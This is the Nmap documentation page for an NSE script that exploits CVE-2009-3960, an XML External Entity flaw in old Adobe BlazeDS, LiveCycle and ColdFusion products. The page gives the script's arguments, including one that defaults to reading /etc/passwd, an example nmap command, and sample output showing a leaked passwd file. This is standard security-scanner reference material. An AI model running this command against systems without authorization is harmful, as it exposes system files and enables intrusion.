Script http-vuln-cve2009-3960

Script types: portrule
Categories: exploit, intrusive, vuln
Download: https://svn.nmap.org/nmap/scripts/http-vuln-cve2009-3960.nse

Script Summary

Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.

This vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0

For more information see:

• http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
• https://www.securityfocus.com/bid/38197
• Metasploit module: auxiliary/scanner/http/adobe_xml_inject

See also:

• http-adobe-coldfusion-apsa1301.nse
• http-coldfusion-subzero.nse
• http-vuln-cve2010-2861.nse

Script Arguments

http-vuln-cve2009-3960.root

Points to the root path. Defaults to "/"

http-vuln-cve2009-3960.readfile

target file to be read. Defaults to "/etc/passwd"

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" <target>

Script Output

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960:
|     samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_

Requires

• http
• shortport
• stdnse
• string
• table
• vulns

---

Author:

• Hani Benhabiles

License: Same as Nmap--See https://nmap.org/book/man-legal.html